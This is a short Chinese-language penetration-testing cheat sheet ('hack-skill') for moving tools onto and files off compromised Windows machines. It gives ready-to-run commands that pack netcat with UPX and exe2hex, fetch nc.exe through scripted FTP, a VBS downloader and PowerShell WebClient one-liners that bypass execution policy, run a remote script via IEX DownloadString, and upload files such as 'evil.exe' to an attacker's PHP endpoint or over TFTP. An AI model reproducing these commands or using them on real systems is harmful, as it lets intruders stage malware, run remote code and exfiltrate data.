hack-skill

windows shell 中文乱码

chcp 65001

upx && exe2hex 传输文件

upx -9 nc.exe

exe2hex -x nc.exe -p nc.cmd

cat nc.cmd |xclip -selection clipboard

ftp 传输文件

echo open 192.168.0.2 21> ftp.txt
echo USER d2x3>> ftp.txt
echo passwd>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo byte >> ftp.txt

ftp -v -n -s:ftp.txt

vbs 传输文件

echo URL = WScript.Arguments(0)> wget.vbs
echo saveTo = WScript.Arguments(1)>> wget.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")>> wget.vbs
echo objXMLHTTP.open "GET", URL, false>> wget.vbs
echo objXMLHTTP.send()>> wget.vbs
echo If objXMLHTTP.Status = 200 Then>> wget.vbs
echo Set objADOStream = CreateObject("ADODB.Stream")>> wget.vbs
echo objADOStream.Open>> wget.vbs
echo objADOStream.Type = 1 >> wget.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody>> wget.vbs
echo objADOStream.Position = 0>> wget.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject")>> wget.vbs
echo If objFSO.Fileexists(saveTo) Then objFSO.DeleteFile saveTo>> wget.vbs
echo Set objFSO = Nothing>> wget.vbs
echo objADOStream.SaveToFile saveTo>> wget.vbs
echo objADOStream.Close>> wget.vbs
echo Set objADOStream = Nothing>> wget.vbs
echo End if>> wget.vbs
echo Set objXMLHTTP = Nothing>> wget.vbs
echo WScript.Quit>> wget.vbs

cscript wget.vbs http://192.168.31.80:8000/nc.exe nc.exe

powershell 传输文件

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://192.168.31.80:8000/nc.exe" >>wget.ps1
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

#一句话
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://192.168.31.80:8000/nc.exe"""; $destination="""nc.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"

#一句话2
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.80:8000/nc.exe', 'ncccc.exe')

powershell 执行脚本

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.31.80:8000/helloworld.ps1')

php 传输文件

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.31.80/upload.php', 'evil.exe)

tftp 传输文件

#server
sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp

#client
tftp -i 192.168.31.80 put stuff.exe